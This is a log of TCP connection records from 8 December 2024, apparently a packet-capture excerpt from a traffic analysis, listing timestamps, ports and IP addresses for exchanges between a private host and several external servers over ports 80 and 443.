Dec 8, 2024 13:31:20.951540947 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.951550961 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.951581955 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.951601982 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.958796024 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.958815098 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.958858013 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:20.958868980 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:20.958918095 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.000394106 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.000477076 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.018404007 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.018493891 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.018508911 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.019098043 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.021790981 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.021985054 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.021991014 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.022109985 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.026061058 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.026123047 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.026128054 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.026182890 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.029299974 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.029386044 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.029392004 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.029432058 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.033199072 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.033344984 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.033351898 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.033550024 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.037339926 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.037434101 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.037440062 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.037477970 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.040720940 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.040810108 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.040815115 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.040858984 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.044071913 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.044156075 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.044161081 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.044203997 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.048430920 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.048516035 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.048521042 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.048563957 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.052403927 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.052522898 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.052526951 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.052736998 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.054598093 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.054663897 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.054668903 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.054784060 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.072489023 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.072501898 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.101464987 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.101486921 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.101562977 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.101583004 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.101622105 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.101632118 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.108733892 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.108752012 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.108838081 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.108850956 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.108977079 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.115978956 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.115995884 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.116065979 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.116091013 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.116353989 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.122380018 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.122397900 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.122450113 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.122461081 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.122529984 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.129806995 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.129826069 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.129920959 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.129936934 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.130228996 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.136920929 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.136939049 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.137022018 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.137038946 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.137108088 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.143847942 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.143870115 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.143948078 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.143970966 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.144314051 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.151068926 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.151091099 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.151179075 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.151194096 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.153228045 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.156539917 CET	49743	443	192.168.2.6	23.206.197.26
Dec 8, 2024 13:31:21.156582117 CET	443	49743	23.206.197.26	192.168.2.6
Dec 8, 2024 13:31:21.156904936 CET	49743	443	192.168.2.6	23.206.197.26
Dec 8, 2024 13:31:21.159945011 CET	49743	443	192.168.2.6	23.206.197.26
Dec 8, 2024 13:31:21.159962893 CET	443	49743	23.206.197.26	192.168.2.6
Dec 8, 2024 13:31:21.272077084 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.272114038 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.272310019 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.272644997 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.272659063 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.280237913 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.288228989 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.288259029 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.288383961 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.288574934 CET	49745	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.288584948 CET	443	49745	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.294395924 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.294418097 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.294477940 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.294488907 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.294692039 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.303643942 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.303663969 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.303704023 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.303711891 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.303744078 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.303770065 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.307761908 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.307780981 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.307836056 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.307845116 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.307948112 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.315149069 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.315167904 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.315222979 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.315232038 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.315291882 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.322361946 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.322380066 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.322428942 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.322437048 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.322495937 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.328682899 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.328700066 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.328763008 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.328769922 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.328807116 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.336822033 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.336842060 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.336895943 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.336905003 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.337186098 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.343132019 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.343149900 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.343187094 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.343194962 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.343223095 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.343238115 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.399563074 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.484843016 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.484884977 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.484992027 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.484992027 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.485006094 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.485183001 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.485656977 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.485701084 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.485718966 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.485850096 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.487591982 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.487608910 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.653312922 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.653340101 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.653529882 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.653821945 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:21.653836012 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:21.710496902 CET	443	49736	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.710937023 CET	49736	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:21.710952997 CET	443	49736	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.711407900 CET	49736	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:21.711416960 CET	443	49736	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.713552952 CET	443	49737	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.713829994 CET	49737	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:21.713840961 CET	443	49737	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.714226007 CET	49737	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:21.714236975 CET	443	49737	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.715806007 CET	443	49739	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.716089010 CET	49739	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:21.716098070 CET	443	49739	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.716470957 CET	49739	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:21.716475964 CET	443	49739	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.717161894 CET	443	49740	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.717259884 CET	443	49738	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.717475891 CET	49740	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:21.717483997 CET	443	49740	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.717685938 CET	49738	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:21.717693090 CET	443	49738	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.718092918 CET	49738	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:21.718096972 CET	443	49738	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.718208075 CET	49740	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:21.718211889 CET	443	49740	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:21.722534895 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.722600937 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.722631931 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.722771883 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.726927042 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.726979971 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.728317022 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.728368998 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.728385925 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.728868008 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.736646891 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.736701965 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.736792088 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.736834049 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.745187998 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.745199919 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.745244026 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.753532887 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.753591061 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.753624916 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.754034996 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.761959076 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.762135983 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.780499935 CET	443	49741	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:21.780567884 CET	49741	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:21.780862093 CET	49741	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:21.780867100 CET	443	49741	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:21.781311035 CET	49741	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:21.781315088 CET	443	49741	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:21.781411886 CET	49741	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:21.781415939 CET	443	49741	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:21.852775097 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.852956057 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.853034019 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.856848955 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.856873989 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.856908083 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.856923103 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.865360975 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.865413904 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.865447044 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.865492105 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.873754978 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.873807907 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.873883009 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.873929024 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.882148981 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.882204056 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.882298946 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.882492065 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.914630890 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.914694071 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.914779902 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.914823055 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.918796062 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.918905020 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.918932915 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.918982983 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.927176952 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.927232981 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.927272081 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.927319050 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.935698986 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.935746908 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.935800076 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.935924053 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.944041967 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.944124937 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.944175005 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.952430010 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.952476978 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.952487946 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.952541113 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.960836887 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.960886002 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.982836008 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.982896090 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.982991934 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.983078957 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.990633965 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.990653038 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.990690947 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.993992090 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.994029999 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:21.994043112 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:21.994069099 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.000300884 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.000359058 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.000441074 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.000503063 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.008467913 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.008537054 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.008593082 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.008651018 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.044538021 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.044595003 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.044599056 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.044636965 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.047921896 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.048001051 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.048027992 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.048038960 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.054779053 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.054838896 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.054882050 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.054929972 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.061568022 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.061634064 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.061656952 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.061702013 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.068243027 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.068306923 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.068341970 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.068447113 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.075079918 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.075130939 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.075285912 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.075334072 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.081820965 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.081871986 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.081924915 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.081970930 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.088198900 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.088242054 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.088253021 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.088277102 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.094419956 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.094475985 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.094521046 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.107065916 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.107137918 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.107177019 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.107217073 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.108864069 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.108876944 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.108911037 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.108931065 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.112798929 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.112838984 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:22.112848043 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:22.112893105 CET	49724	80	192.168.2.6	185.215.113.206
